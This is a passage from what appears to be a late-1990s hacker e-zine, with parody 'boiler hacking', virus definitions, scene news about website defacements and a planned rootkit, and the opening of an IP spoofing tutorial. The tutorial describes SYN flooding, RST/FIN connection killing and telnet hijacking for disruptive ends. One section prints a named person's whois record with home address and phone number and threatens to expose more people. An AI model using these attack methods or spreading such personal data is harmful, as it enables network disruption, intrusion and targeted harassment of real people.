BoILaH wIV yOUR EyeS. 2: TrAcInG PiPeS aLL ArOuND yOuR hOuSe (bit like traceroute programs do) 3: UsInG StEalTh TEkNiquEs By HidInG ArOuND yOuR hOuSE AnD LIsTENinG fOr WaTeR, liKE FrOm TaPs aNd StUFf... If YoU dOnT FiNd AnY HIdDen PoRtS, ThEN YeW cAN JuST LoGiN FrOM a WaSHiNG MaChIne, Or OtHeR tRUstEd HoSt On ThE NeTwOrK, wHeN yOu COnnEcT tO tHa BoiLaH FRoM tHe WasHiNg MaChINe YeW wiLL sEe sOmeThInG LiKe ThIs... +-------------------+ | GEneRaL eLeKTrIk | | M:0225 | | S:b4588 | | T:02 | +-------------------+ BoiLaH OS RelEasE 2.54 (bIg BaAAadAss BoILaH) login: BoiLaH password: <--- We AttEmPtid ThE DeFauLt "BoiLaH" ------------------------------------------------------------ L0ghINn GRaNTiD *************** ------------------------------------------------------------ WeLKoMe To bOiLAh [BOPR] bOiLiNg OpErAtIoNS PlaN rEsPonSe ------------------------------------------------------------ login on tty[wAShInG mAcHiNE] last login from BaTHrEwm.COM on tty[ShOwEr] at 7:43p.m. 1: sHuTDoWn 2: CoLd WaTeR 3: hOt wAtEr 4: UNiX TyPE SheLL ENViRONMEnT If YeW GhET THiS YEW ArE COOL)(#*$ Ok NoW CHEwZe NuMbAhh 4, ThEn YeWsE ThIS uniVeRSaL BoiLAhh ExPLoiT... % fuck yew eye am eleet and k-r4d 'cos muh name iz ZeroCool! fuck : command not found % whoami root % tHe bEst tImEs To ReWT BoILaHs Is lAtE aT nIgHt WhEn No-OnE Is LOggEd-In, CoS In ThA dAY, yEw GEt uSeRs LoGgEd iN To DoWLoAd WatEr AnD ShIt. eYe WiLL KoNItuE wItH oTheR ExAMplEs NeXt TiMe! T_K 2. Virus Definitions : so1o This is for all you lame fucks out there who say I infect your systems with viruses, even when the only malicious shit I code are Windoze killers, anyway here are a few definitions, just so you know what you're on about next time =) What are computer viruses (and why should I worry about them)? -------------------------------------------------------------- According to Fred Cohen's well-known definition, a COMPUTER VIRUS is a computer program that can infect other computer programs by modifying them in such a way as to include a (possibly evolved) copy of itself. Note that a program does not have to perform outright damage (such as deleting or corrupting files) in order to to be called a "virus". However, Cohen uses the terms within his definition (e.g. "program" and "modify") a bit differently from the way most anti-virus researchers use them, and classifies as viruses some things which most of us would not consider viruses. Many people use the term loosely to cover any sort of program that tries to hide its (malicious) function and tries to spread onto as many computers as possible. (See the definition of "Trojan".) Be aware that what constitutes a "program" for a virus to infect may include a lot more than is at first obvious - don't assume too much about what a virus can or can't do! These software "pranks" are very serious; they are spreading faster than they are being stopped, and even the least harmful of viruses could be fatal. For example, a virus that stops your computer and displays a message, in the context of a hospital life-support computer, could be fatal. Even those who created the viruses could not stop them if they wanted to; it requires a concerted effort from computer users to be "virus-aware", rather than the ignorance and ambivalence that have allowed them to grow to such a problem. What is a Trojan Horse? ----------------------- A TROJAN HORSE is a program that does something undocumented which the programmer intended, but that the user would not approve of if he knew about it. According to some people, a virus is a particular case of a Trojan Horse, namely one which is able to spread to other programs (i.e., it turns them into Trojans too). According to others, a virus that does not do any deliberate damage (other than merely replicating) is not a Trojan. Finally, despite the definitions, many people use the term "Trojan" to refer only to a *non-replicating* malicious program, so that the set of Trojans and the set of viruses are disjoint. What are the main types of PC viruses? -------------------------------------- Generally, there are two main classes of viruses. The first class consists of the FILE INFECTORS which attach themselves to ordinary program files. These usually infect arbitrary .COM and/or .EXE programs, though some can infect any program for which execution is requested, such as .SYS, .OVL, .PRG, & .MNU files. File infectors can be either DIRECT ACTION or RESIDENT. A direct- action virus selects one or more other programs to infect each time the program which contains it is executed. A resident virus hides itself somewhere in memory the first time an infected program is executed, and thereafter infects other programs when *they* are executed (as in the case of the Jerusalem) or when certain other conditions are fulfilled. The Vienna is an example of a direct-action virus. Most other viruses are resident. The second category is SYSTEM or BOOT-RECORD INFECTORS: those viruses which infect executable code found in certain system areas on a disk which are not ordinary files. On DOS systems, there are ordinary boot-sector viruses, which infect only the DOS boot sector, and MBR viruses which infect the Master Boot Record on fixed disks and the DOS boot sector on diskettes. Examples include Brain, Stoned, Empire, Azusa, and Michelangelo. Such viruses are always resident viruses. Finally, a few viruses are able to infect both (the Tequila virus is one example). These are often called "MULTI-PARTITE" viruses, though there has been criticism of this name; another name is "BOOT-AND-FILE" virus. FILE SYSTEM or CLUSTER viruses (e.g. Dir-II) are those which modify directory table entries so that the virus is loaded and executed before the desired program is. Note that the program itself is not physically altered, only the directory entry is. Some consider these infectors to be a third category of viruses, while others consider them to be a sub-category of the file infectors. What is a stealth virus? ------------------------ A STEALTH virus is one which hides the modifications it has made in the file or boot record, usually by monitoring the system functions used by programs to read files or physical blocks from storage media, and forging the results of such system functions so that programs which try to read these areas see the original uninfected form of the file instead of the actual infected form. Thus the viral modifications go undetected by anti-viral programs. However, in order to do this, the virus must be resident in memory when the anti-viral program is executed. Example: The very first DOS virus, Brain, a boot-sector infector, monitors physical disk I/O and re-directs any attempt to read a Brain-infected boot sector to the disk area where the original boot sector is stored. The next viruses to use this technique were the file infectors Number of the Beast and Frodo (= 4096 = 4K). Countermeasures: A "clean" system is needed so that no virus is present to distort the results. Thus the system should be built from a trusted, clean master copy before any virus-checking is attempted; this is "The Golden Rule of the Trade." With DOS, (1) boot from original DOS diskettes (i.e. DOS Startup/Program diskettes from a major vendor that have been write-protected since their creation); (2) use only tools from original diskettes until virus-checking has completed. What is a polymorphic virus? ---------------------------- A POLYMORPHIC virus is one which produces varied (yet fully operational) copies of itself, in the hope that virus scanners will not be able to detect all instances of the virus. One method to evade signature-driven virus scanners is self-encryption with a variable key; however these viruses (e.g. Cascade) are not termed "polymorphic," as their decryption code is always the same and thus can be used as a virus signature even by the simplest, signature- driven virus scanners (unless another virus or program uses the identical decryption routine). One method to make a polymorphic virus is to choose among a variety of different encryption schemes requiring different decryption routines: only one of these routines would be plainly visible in any instance of the virus (e.g. the Whale virus). A signature-driven virus scanner would have to exploit several signatures (one for each possible encryption method) to reliably identify a virus of this kind. A more sophisticated polymorphic virus (e.g. V2P6) will vary the sequence of instructions in its copies by interspersing it with "noise" instructions (e.g. a No Operation instruction, or an instruction to load a currently unused register with an arbitrary value), by interchanging mutually independent instructions, or even by using various instruction sequences with identical net effects (e.g. Subtract A from A, and Move 0 to A). A simple-minded, signature-based virus scanner would not be able to reliably identify this sort of virus; rather, a sophisticated "scanning engine" has to be constructed after thorough research into the particular virus. The most sophisticated form of polymorphism discovered so far is the MtE "Mutation Engine" written by the Bulgarian virus writer who calls himself the "Dark Avenger". It comes in the form of an object module. Any virus can be made polymorphic by adding certain calls to the assembler source code and linking to the mutation-engine and random-number-generator modules. The advent of polymorphic viruses has rendered virus-scanning an ever more difficult and expensive endeavor; adding more and more search strings to simple scanners will not adequately deal with these viruses. What is a companion virus? -------------------------- A COMPANION virus is one which, instead of modifying an existing file, creates a new program which (unknown to the user) gets executed by the command-line interpreter instead of the intended program. (On exit, the new program executes the original program so that things will appear normal.) The only way this has been done so far is by creating an infected .COM file with the same name as an existing .EXE file. Note that those integrity checkers which look only for *modifications* in *existing* files will fail to detect such viruses. (Note that not all researchers consider this type of malicious code to be a virus, since it does not modify existing files.) Miscellaneous Jargon and Abbreviations -------------------------------------- BSI = Boot Sector Infector: a virus which takes control when the computer attempts to boot (as opposed to a file infector). CMOS = Complementary Metal Oxide Semiconductor: A memory area that is used in AT and higher class PCs for storage of system information. CMOS is battery backed RAM (see below), originally used to maintain date and time information while the PC was turned off. CMOS memory is not in the normal CPU address space and cannot be executed. While a virus may place data in the CMOS or may corrupt it, a virus cannot hide there. DOS = Disk Operating System. We use the term "DOS" to mean any of the MS-DOS, PC-DOS, or DR DOS systems for PCs and compatibles, even though there are operating systems called "DOS" on other (unrelated) machines. MBR = Master Boot Record: the first Absolute sector (track 0, head 0, sector 1) on a PC hard disk, that usually contains the partition table (but on some PCs may simply contain a boot sector). This is not the same as the first DOS sector (Logical sector 0). RAM = Random Access Memory: the place programs are loaded into in order to execute; the significance for viruses is that, to be active, they must grab some of this for themselves. However, some virus scanners may declare that a virus is active simply when it is found in RAM, even though it might be simply left over in a buffer area of RAM rather than truly being active. TOM = Top Of Memory: the end of conventional memory, an architectural design limit at the 640K mark on most PCs. Some early PCs may not be fully populated, but the amount of memory is always a multiple of 64K. A boot-record virus on a PC typically resides just below this mark and changes the value which will be reported for the TOM to the location of the beginning of the virus so that it won't get overwritten. Checking this value for changes can help detect a virus, but there are also legitimate reasons why it may change. A very few PCs with unusual memory managers/settings may report in excess of 640K. TSR = Terminate but Stay Resident: these are PC programs that stay in memory while you continue to use the computer for other purposes; they include pop-up utilities, network software, and the great majority of viruses. These can often be seen using utilities such as MEM, MAPMEM, PMAP, F-MMAP and INFOPLUS. 3. Fun With whois, sinnerz.com : so1o Lewk WhuT eyE FoUnd... phish:~> whois sinerz.com [rs.internic.net] SIN (SINNERZ3-DOM) 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Domain Name: SINNERZ.COM Administrative Contact: Kimminau, Suzette (SK2455) evilchic@NWLINK.COM (206)454-7176 Technical Contact, Zone Contact: Schmittel, Blair (BS469) blair@CYBER-NAUT.COM (801)654-3139 Record last updated on 26-Mar-97. Record created on 26-Mar-97. Domain servers in listed order: STRECH.CYBER-NAUT.COM 192.41.77.5 ITIS.EASILINK.COM 192.41.78.2 The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. phish:~> fwhois sinnerz.com@nic.ddn.mil [nic.ddn.mil] No match for "SINNERZ.COM". Please be advised that this whois server only contains DOD Information. All INTERNET Domain, IP Network Number, and ASN records are kept in the Internet Registry, RS.INTERNIC.NET. ------------------------------------------------------------------------------- =--> S.I.N : [S] cared sh [I] tless lame fucks not-so-a [N] onymous. <--= ------------------------------------------------------------------------------- If sIn play this down as fake, why not phone up Evil Chic and ask if Suzey is there? You will soon find out the truth =) Expect details of all sIn members soon. 4. Hacking Space Shuttles, Abort Codes : NailGun Okay, if you ever decide to hack a space shuttle (*.arc.nasa.gov is hacked very frequently) and you actually plan it all out, make sure you collect all the parts of this "mini-guide" of little things that are important and you will need to know, this section concerns.... SPACE SHUTTLE ABORT MODES ------------------------- Space Shuttle launch abort philosophy aims toward safe and intact recovery of the flight crew, orbiter and its payload. Abort modes include: * Abort-To-Orbit (ATO) -- Partial loss of main engine thrust late enough to permit reaching a minimal 105-nautical mile orbit with orbital maneuvering system engines. * Abort-Once-Around (AOA) -- Earlier main engine shutdown with the capability to allow one orbit around before landing at Edwards Air Force Base, Calif.; White Sands Space Harbor (Northrup Strip), N.M.; or the Shuttle Landing Facility (SLF) at Kennedy Space Center, Fla.. * Trans-Atlantic Abort Landing (TAL) -- Loss of two main engines midway through powered flight would force a landing at Banjul, The Gambia; Ben Guerir, Morocco; or Moron, Spain. * Return-To-Launch-Site (RTLS) -- Early shutdown of one or more engines and without enough energy to reach Banjul would result in a pitch around and thrust back toward KSC until within gliding distance of the SLF. STS-35 contingency landing sites are Edwards AFB, White Sands, Kennedy Space Center, Banjul and Ben Guerir, Moron. Next time we will probably look at the payloads of space shuttles, l8r. 5. Country Domain Listing : SirLance Listing Of Domains By Country, like *.fr *.uk etc. etc. AD - Andorra - Andorre AE - Imarata al Arabiya al Muttahidah - Ittihad al Imirat alArabiya - United Arab Emirates AF - Afghanistan - Afghanestan AG - Antigua and Barbuda AI - Anguilla AL - Shqipëria - Albania AM - Armenia - Hayastan AN - Netherlands Antilles - Nederlandse Antillen AO - Angola AQ - Antarctica AR - Argentina AS - American Samoa AT - Austria - Osterreich AU - Australia AW - Aruba AZ - Azerbaijan - Azerbaycan BA - Bosnia and Herzegovina - Bosna i Hercegovina BB - Barbados BD - Bangladesh BE - Belgium - Belgique - Belgie BF - Burkina BG - Bulgaria BH - Bahrain - Bahrayn BI - Burundi BJ - Benin BM - Bermuda BN - Brunei BO - Bolivia BR - Brazil - Brasil BS - Bahamas BT - Bhutan BV - Bouvet Island - Bouvetoya BW - Botswana BY - Belarus - Byelarus' BZ - Belize CA - Canada CC - Cocos (Keeling) Islands (Australia) CF - Central Africa CG - Congo CH - Switzerland - Schweiz - Suisse - Svizzera - Svizra - Helvetia CI - Cote d'Ivoire CK - Cook Islands CL - Chile CM - Cameroon CN - China CO - Colombia CR - Costa Rica CS - Czechoslovakia CU - Cuba CV - Cape Verde - Cabo Verde CX - Christmas Island (Australia) CY - Cyprus CZ - Czech Republic - Cechy DD - Germany - Deutschland DE - Germany - Deutschland DJ - Djibouti DK - Denmark - Danmark DM - Dominica DO - Dominican Republic - Republica Dominicana DZ - Algeria - Jaza'ir EC - Ecuador EE - Estonia - Eesti EG - Egypt - Misr EH - Western Sahara ER - Eritrea ES - Spain - Espana ET - Ethiopia - Ityop'iya FI - Finland - Suomi FJ - Fiji FK - Falkland Islands FM - Micronesia FO - Faroe Islands - Faroyar FR - France FX - Metropolitan France GA - Gabon GB - United Kingdom GD - Grenada GE - Georgia - Sak'art'velo GF - French Guiana - Guyane GH - Ghana GI - Gibraltar (UK) GL - Greenland - Kalaallit Nunaat GM - The Gambia GN - Guinea - Guinee GP - Guadaloupe (France) GQ - Equatorial Guinea - Guinea Ecuatorial GR - Greece - Ellas GS - South Georgia GT - Guatemala GU - Guam GW - Guinea-Bissau - Guine-Bissau GY - Guyana HK - Hong Kong (UK) HM - Heard Island and McDonald Islands (Australia) HN - Honduras HR - Croatia - Hrvatska HT - Haiti HU - Hungary - Magyarorszag ID - Indonesia IE - Ireland - Éire IL - Israel - Yisra'el IN - India - Bharat IO - Indian Ocean Territory (UK) IQ - Iraq IR - Iran IS - Island - Iceland IT - Italy - Italia JM - Jamaica JO - Jordan - Urdun JP - Japan KE - Kenya KG - Kyrgyzstan KH - Cambodia - Kampuchea KI - Kiribati KM - Comoros - Comores KN - Saint Kitts and Nevis KP - Korea - Choson KR - Korea KW - Kuwait - Kuwayt KY - Cayman Islands KZ - Kazakhstan LA - Laos LB - Lebanon - Lubnaniyah LC - Saint Lucia LI - Liechtenstein LK - Sri Lanka LR - Liberia LS - Lesotho LT - Lithuania - Lietuva LU - Luxembourg LV - Latvia - Latvija LY - Libya - Libiya MA - Morocco - Maghrib MC - Monaca MD - Moldova MG - Madagascar MH - Marshall Islands MK - Macedonia - Makedonija ML - Mali MM - Burma - Myanma MN - Mongolia - Mongol Uls MO - Macau MP - Northern Mariana Islands MQ - Martinique (France) MR - Mauritania - Muritaniyah MS - Montserrat MT - Malta MU - Mauritius MV - Maldives MW - Malawi MY - Malaysia MZ - Mozambique - Mocambique NA - Namibia NC - New Caledonia - Nouvelle-Caledonie NE - Niger NF - Norfolk Island (Australia) NG - Nigeria NI - Nicaragua NL - Netherlands - Nederland NO - Norway - Norge NP - Nepal NR - Nauru NU - Niue NZ - New Zealand OM - Oman - Uman PA - Panama PE - Peru PF - French Polynesia - Polynesie Francaise PG - Papua New Guinea PH - Philippines - Pilipinas PK - Pakistan PL - Poland - Polska PM - Saint-Pierre et Miquelon PN - Pitcairn Islands PR - Puerto Rico PT - Portugal PW - Palau - Belau PY - Paraguay QA - Qatar RE - Reunion RO - Romania RU - Russia - Rossiya RW - Rwanda SA - Saudi Arabia - Arabiya as Suudiyah SB - Solomon Islands SC - Seychelles SD - Sudan SE - Sweden - Sverige SG - Singapore - Singapura SH - Saint Helena (UK) SI - Slovenia - Slovenija SJ - Svalbard og Jan Mayen SK - Slovakia - Slovensko SL - Sierra Leone SM - San Marino SN - Senegal SO - Somalia SR - Suriname ST - Sao Tome e Principe SU - Soviet Union - Sovietskiy Soyuz SV - El Salvador SY - Syria - Suriyah SZ - Swaziland TC - Turks and Caicos Islands TD - Chad - Tchad TF - Southern and Antarctic Lands - Terre Australes et Antarctiques TG - Togo TH - Thailand TJ - Tajikistan - Tojikiston TK - Tokelau (New Zealand) TM - Turkmenistan - Tiurkmenostan TN - Tunisia - Tunis TO - Tonga TP - Timor TR - Turkey - Turkiye TT - Trinidad and Tobago TV - Tuvalu TW - Taiwan - T'ai-wan TZ - Tanzania UA - Ukraine - Ukrayina UG - Uganda UM - United States Minor Outlying Islands US - United States of America UY - Uruguay UZ - Uzbekistan - Uzbekiston VA - Holy See VC - Saint Vincent and the Grenadines VE - Venezuela VG - Virgin Islands (UK) VI - Virgin Islands (USA) VN - Vietnam - Viet Nam VU - Vanuatu WF - Wallis et Futuna WS - Samoa YD - Yemen YE - Yemen YT - Mayotte (France) YU - Yugoslavia ZA - South Africa ZM - Zambia ZR - Zaire ZW - Zimbabwe =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== 1. CoreWars : so1o / od|phreak od|phreak was telling me about an idea he had, then called just "Hacker Wars" it was about teams, or groups of hackers who had a league system and hacked each others systems to gain points... We both made sets of rules and decided on a name also, CoreWars...Here are the rules as to date : - 6 hackers per team. - Each team has 2 systems. - The systems must run linux, and be up 24/7. - The game is played from a friday at midnight to a sunday at midnight (48 hours). - On systems owned by the team, each user may have one account, with any systems priveleges. - Each team has 1 account on each enemy system - 2.5mb quota per account - must be a normal user Rules : ------- - super users on opposing teams are NOT allowed to intervine with other hackers, this includes killing, writing to their terminals, or disturbing them in any way shape or form, however, super users are allowed to use snoop and other programs to monitor opposing team members, but they cannot DIRECTLY step in and kill the user. super users CANNOT delete files created by the opposing team members, however they ARE allowed to delete files if they have been MODIFIED, like /etc/motd. - teams conquer a system by forcing it to be shut down, switched off, or any other measure that prevents persons from connecting or using that system. This can include rm'ng the hard drive or any other suitable measure. The Winning Team Is The Last Team With A System That Has Not Been Shut Down. if you shut a system down : 100 points if your system gets shut down : -50 points if you keep both of your systems up : 25 points if you lose both of your systems : -25 points On Sunday midnight, all points are worked out, and the league positions are calculated. These Rules Are Currently Being Changed : http://www.neonunix.org/corewars/ Suggestions to myself or od|phreak... So, if you have a team of 6 that you would like to enter in CoreWars, mail corewars@ with your team name, details, system IP and other relevant information... 2. Technophoria Want A Piece Of CodeZero Too? : so1o Technophoria, based at www.technophoria.com, did *NOT* hack our webpage at www.neonunix.org/codezero/ as i dont even have a l/p to neonunix.org, anyway, they uploaded this shiznit to the page, obviously with neonunix's account, which is the only one on the system... Dont talk shit about Technophoria


-Particle Man

Hmmm, who the fuck is Particle Man?! last time I checked the Technophoria member list it had... Deprave BroncBuster Sludge Acid Angel Modify The Messiah Banshee Now, I dont get on well with Modify or The Messiah (who are in like, 3 other groups each) but Deprave is a good friend, Sludge and Acid I have never met and Bronc is cool. I dont know whats goin down wit that shit, but the last thing I need is some punk trying to say that I write shit about Technophoria, seeing I have never written a thing about them, but anyway, if you do visit the Technophoria WWW site, you will see that sIn and Technophoria are working on the same project with the same people, Utopia (mentioned in the last issue by *ODPHREAK*) I wonder who will take the credit and / or release the actual program, hmm..I talked to The Messiah... Utopia will be a encryption utility, release by SIN/Technophoria, written by The Messiah and Fucking Hostile. No release date is given. encryption util? for what purposes? Encrypting files, clipboard, and an editor, like Puffer. thru windoze? Yes. ahh 16 bit. With plans for a 32 bit version. because doesnt pgp do that and alot more? No, it doesn't. what kind of encryption are we talking about? PGP only uses ONE algorithm, IDEA. About 16 different algorithms. and yours will use? RC4, RC5, IDEA, Blowfish, DES, SuperIDEA... I'm still looking into that... isnt that just ripping other peoples shit? blatently No. If so then PGP is ripping. Puffer is ripping. The source for almost all algorihtms is released. So ppl can evaluate it.. what about RC5 source then? Have it. okay... so you have all your algorithms RSA condones non-commercial use of RC4 and RC5. Pretty much. but how will the program work then? Right now I'm wondering which algorihtms to put into it. will it have secret keys and public keys like pgp ? You select an algorihtm, files, and hit encrypt... No, symetric key encryption. One password... isnt that a bit unsecure? I'm making a public key encryption program later on... No, it isn't. seeing then the password will have to be given to the other user over a medium such as IRC You can't transmit keys, true... which can be logged But this isn't for communication as much as file storgae... People can use PGP to transmit keys... so what will the program include? Hmmm... what won't it? I'm hoping to include some steganography in it... It'll be something like Puffer, only WAY better... okzy 1st release will be 16-bit right? Yes... will it have any problems running thru 95 / NT ? Nope. I'm using Win95... will users need .dll files to run it? One. But that'll come included... No VB bullshit... It's made in Delphi, so the runtime library is in the EXE... delphi i code borland c++ Get C++ Builder then... i plan on doing so Like Delphi, but uses C++... okie, l8r cya 3. Global kOS News And Questions / Answers : Spidey There have been several rumors circulating about what happened to us since globalkos.org went down. They range from us being busted by feds to stories about purple shrouds and phenobarbital. There have also been rumors about dissention among our ranks and group infighting. Q: What happened to globalkos.org? Did the feds shut it down? Did their ISP shut it down? Did they move their site to keep it hidden? A: Half of us didn't feel like paying for it. We weren't shut down, nor is the site hidden out there somewhere. We're looking into alternatives. Q: Did Acid Angel leave GkOS for Technophoria? A: No. He is working with the guys at Technophoria, but he is still a part of Global kOS. Q: Did Silicon Toad leave the group altogether? A: Somebody came up with this one on the basis of a broken link at globalkos.org. ST moved his site, and no one bothered to update the link. Through some stretch of logic this guy decided it meant ST split. Q: What about Up Yours 4? A: It's slated for release on March 30th. Q: Did GkOS get busted? A: No. Q: I thought Cobra (Vortex, Morbid Disorder, Kludge, or Ryan) was a member of GkOS. A: I've never even heard of these people. They are not present, nor former members. Our members are: Acid Angel Glitch Materva Raven Shadow Hunter Silicon Toad Spidey That Guy Zaven Q: I heard there was a major disagreement within the group, and there's a civil war going on between them. Is it true? A: No. This is completely unfounded. Whoever started this one pulled it straight out of his ass. 4. www.ncaa.com Hack Makes News : so1o Conflict member TiK hacked www.ncaa.com, he made TV news, papers, and big internet news, statements from the NCAA and other organisations can be found on www.infowar.com, so1o never believed TiK would or could hack such a site due to the high security levels, but good 'ole TiK proved us all wrong, expect the index.html s00n! 5. CodeZero To Release sunOS 5.x RootKit : so1o Yeah, werkin' on it, lewkout!! 6. Too Many nethosting.com Break-Ins : so1o www.hawkee.com and many other "vservers" at nethosting.com have been hacked or attacked, like sinnerz.com (although no damage was done to the site) and so the admin at nethosting can't be very happy with their security, I was talking to hawkee about the hacks into his system by two members of the CodeZero (thats what the numbers stood for - minus 2 from each, turn the 0 into a 26, then 1 = A, 2 = B, 3 = C etc. = CODEZERO) and he was saying that newhosting had really boosted their secruity, this was also the case when access to cough-syrup.nethosting.com was gained by one single hacker, as after the attack, the sendmail version was pumped from 8.8.4 to 8.8.5, nethosting are also considering taking action to prevent certain hosts from having access to the system. 7. sulfur of #hack to print a bi-monthly magazine : so1o Access Denied will be printed by sulfur (Edward Givings) of #hack, free copies will be distributed at Beyond Hope, it will be bi-monthly, so you get 6 issues a year, as opposed to 4 of 2600, look out for it... 8. 2600 printers go bust and take $9000 : so1o The latest news is that the 2600 printers have gone bust, and taken $9000 of the 2600's money with them, Winter edition of 2600 might not come out. emmilio can't be very happy can he? =============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== .:. The CodeZero In Assosiation With Dr_Sp00f Presents .:. .:. A Confidence Remains High Production .:. -=[ A short (yea right - T_K) overview of IP spoofing: PART I ]=- -=[ Part of Dr_sp00f's Packet Project']=- (Includes Source for Linux 1.3.X and later kernels) All text and Source code written by Dr_Sp00f himself (Copyright 1997) All source tested on Linux kernel 2.0.X All packet data captured with Sniffit 0.3.2 (a pre-release at that time) PART I: Simple spoofing (Non blind) ----------------------------------- 0. Introduction 0.1 What 0.2 For whom 0.3 Disclaimer 0.4 Licence 1. Short explanation of some words 2. Description of sourcecode 2.1 Source included 2.2 Programmer notes 3. TCP/IP (UDP) in an hazelnutshell 4. Non-blind spoofing 4.1 Know what you are doing 4.2 SYN flooding 4.3 Connection Killing 4.3.1 Using reset (RST) 4.3.2 Closing a connection (FIN) 4.3.3 Improving 4.4 Connection Hijacking 4.5 Other 5. The source code PART I: Simple spoofing (Non blind) 0. Introduction --------------- 0.1 What -------- This document describes some IP spoofing attacks and gives you example source code of the programs used for these attacks (and packet sniffer logs, so you see what exactly happens). It also provides you with an easy to use include file for experimenting a little yourself. Oh, if you make something nice with the "spoofit.h" file, please mail it to me (or a reference where it is available) with a little explanation on what it is (a few lines are enough)... If you have interesting remarks, comment, idea's, ... please contact me Dr_spoof@geocities.com If YOU think of yourself, you are "3>/dev/null or >/dev/echo depends on how smart you are. It is not wise to use what you don't know/understand, so read this before trying anything... it will only take a few minutes, and probably save you some hours of failure... This code is not crippled in the usual way (removing some vital parts), the power is limited by it's briefness, because I wanted to keep everything simple and illustrative (but working). It's a simple job to improve it, and that is the goal of this doc, that you improve it yourself. Special thx to |ExcEEd| and theJUdgE also to all those ppl who deserve it. 0.2 For whom ------------ For people with an elementary knowledge of TCP/IP, some knowledge on C (only the basic setup) and some general UNIX knowledge. It's no use reading this document if you are completely unaware of these things, but mind you, only a little knowledge is enough. 0.3 Disclaimer -------------- I am in no way responsible for the use of this code. By using this software and reading this document you accept the fact that any damage (emotional, physical, dataloss and the end of the world as we know it ...) caused by the use or storage of these programs/documents is not MY responsability. I state that during the writing and testing of this document/source, I never violated any law. All spoofing was done between machines where I had legit root access, or where I had the permission from the legit root. This code can be written by any competent programmer, so this source is not so harmfull as some will say (cauz' I'm sure some people won't like this degree of disclosure). 0.4 Licence ----------- All source code and text is freely available. You can spread it, as long as you don't charge for it (exceptions are a small reproduction fee, if it isn't spread together with commercial software, texts.) You may not spread parts of the document, it should be spread as one package. You may not modify the text and/or source code. You can use the spoofit.h or derived code in your own programs as long as they are not commercial (i.e. FREE), and you give me the credits for it. 1. Short explanation of some words ---------------------------------- This is a short explanation of some words you might see in the text/source. You probably know all this, but I put it in here anyway. Sniffit My favourite Packet Sniffer, all sniffed sequences in this (At time of writing a pre-release 0.3.2) IP-spoofing (further referenced to as spoofing) The forging of IP packets NOTE that not only IP based protocols are spoofed. NOTE that spoofing is also used on a constructive base (LAN spoofing, not discussed here). NOTE that I don't use it on a constructive base ;) Non-blind spoofing Using the spoofing to interfer with a connection that sends packets along your subnet (so generally one of the 2 hosts involved is located on your subnet, or all data traffic has to be passing your network device,... you might consider taking a job at some transatlantic route provider). Blind spoofing Using the spoofing to interfer with a connection (or creating one), that does not send packets along your cable. 2. Description of sourcecode ---------------------------- 2.1 Source included ------------------- spoofit.h The include file that provides some easy to use spoofing functions. To understand the include file and it's functions, read the header of that file for use of the C functions. *.c Example programs (on the use of spoofit.h) that are discussed in this document. Details on these programs are included in the appropriate sections. sniper-rst.c Basic TCP connection killer. (denial-of-services) sniper-fin.c Basic TCP connection killer. (denial-of-services) hijack.c Simple automated telnet connection hijacker. 2.2 Programmer notes -------------------- These programs are just examples. That means, they could be improved a lot. Because I wanted to keep them short and leave some stuff to your imagination, they are very simple. However they all work and are a good starting point. 3. TCP/IP (UDP) in an hazelnutshell ----------------------------------- Because it has been explained enough in 'Phrack Volume Seven, Issue Forty-Eight, File 14 of 18' by daemon9/route/infinity , and there is a lot of documentation available on the subject I will only repeat some things very briefly. (Please read the phrack #48 file or any other document on the subject before reading this). A connection is fully defined with 4 parameters, a source host and port, and a destination host and port. When you make a connection, data is send in packets. Packets take care of low level trafic, and make sure the data arrives (sometimes with special error handling). The spine of most networks is the IP protocol version 4. It is totally independent of all hardware protocols. TCP and UDP are higher level protocols wrapped up in IP packets. All those packets consist of a header and data. IP header contains (amongst other things): IP of source and destination hosts for that packet, and the protocol type of the packet wrapped up in it. (TCP=6, UDP=17, etc.). UDP packets contain (amongst other things): port number of source and destination host. UDP has no such thing as SEQ/ACK, it is a very weak protocol. TCP packets contain (amongst other things): port number of source and destination host, sequence and acknowledge numbers (further refered to as SEQ/ACK), and a bunch of flags. SEQ number: is counted byte per byte, and gives you the number of the NEXT byte to be send, or that is send in this packet. ACK number: is the SEQ number that is expected from the other host. SEQ numbers are chosen at connection initiation. I said is was going to be short... If you didn't understand the above text, read up on it first, because you won't understand sh!t of the rest. 4. Non-blind spoofing --------------------- 4.1 Know what you are doing --------------------------- The concept of non-blind spoofing (NBS further in this doc) is pretty simple. Because packets travel within your reach, you can get the current sequence and acknowledge (SEQ/ACK further in this doc) numbers on the connection. NBS is thus a very easy and accurate method of attack, but limited to connections going over your subnet. In spoofing documentation these attacks are sometimes ommited, because they are mostly 'denial-of-service' attacks, or because people don't realise the advantage a spoof (in particulary a hijack) can have above simple password sniffing. Spoofing in generally is refered to as a verry high level of attack. This refers to blind spoofing (BlS further in this doc), because NBS is kidstuff for a competent coder. 4.2 SYN flooding ---------------- Thoroughly discussed in 'Phrack Volume Seven, Issue Forty-Eight, File 13 of 18'. I won't waste much time on it. Setup: host A <-----][----------X--------------->host B | host S <-----------------/ Concept: Host S impersonates SYN (connection init) coming from host A, to host B. Host A should be unreachable (e.g. turned off, non existant,...). B sends out the second packet of the 3 way TCP handshake. Host B will now wait for response of host A. If host A is reachable it will tell host B (with a reset: RST) that it DID NOT inititate a connection, and thus host B received a bogus packet. (In that case host B will ingnore the SYN, and *normally* nothing will happen) So if A is unreachable, B will wait for response some time. When doing multiple attacks, the backlog of host B is going to be exceeded and host B will not except new connections (read on TCP bugs for additional features ;) for some time. 4.3 Connection Killing ---------------------- Setup: host A <------X------------------------->host B | A,B have a TCP connection running host S <------/ A,S on same subnet (setup is the same in both cases) Use: Clearing mudders of your net, annoying that dude typing an important paper, etc... plain fun. 4.3.1 Using reset (RST) ----------------------- Concept: TCP packets have flags which indicate the status of the packet, like RST. That is a flag used to reset a connection. To be accepted, only the sequence number has to be correct (there is no ACK in a RST packet). So we are going to wait for packets in a connection between A and B. Assume we wait for packets to A. We will calculate (from B's packets) the sequence number for A's packets (from B's ACK's), and fire a bogus RST packet from S (faking to be A) to B. An actual attack: (These are real sniffed packets, although IP numbers of hosts were changed) host A : 166.66.66.1 host B : 111.11.11.11 (S on same subnet as A) (This is a good example of how things not always go as you want, see below for a 